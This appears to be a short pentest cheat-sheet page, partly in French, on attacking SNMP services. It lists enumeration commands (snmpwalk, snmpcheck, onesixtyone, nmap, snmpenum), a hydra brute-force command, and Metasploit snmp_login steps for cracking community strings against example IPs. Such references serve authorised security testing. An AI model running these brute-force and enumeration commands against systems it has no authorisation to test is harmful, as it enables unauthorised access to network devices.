SNMP

snmpwalk -c public -v1 192.168.2.209
snmpcheck -t 192.168.2.209 -c public
onesixtyone -c names -i hosts
nmap -sT -p 161 192.168.2.209 -oG snmp_results.txt
snmpenum -t 192.168.2.210

Cracker le mot de passe pour un service SNMP avec hydra
hydra -P /usr/share/wordlists/pass.txt 10.10.10.10 snmp

Cracker le mot de passe SNMP avec metasploit

use auxiliary/scanner/snmp/snmp_login
msf auxiliary(scanner/snmp/snmp_login)> set rhosts 10.10.10.10
msf auxiliary(scanner/snmp/snmp_login)> set pass_file /usr/share/wordlists/pass.txt
msf auxiliary(scanner/snmp/snmp_login)> set stop_on_success true
msf auxiliary(scanner/snmp/snmp_login)> run

Leave a Reply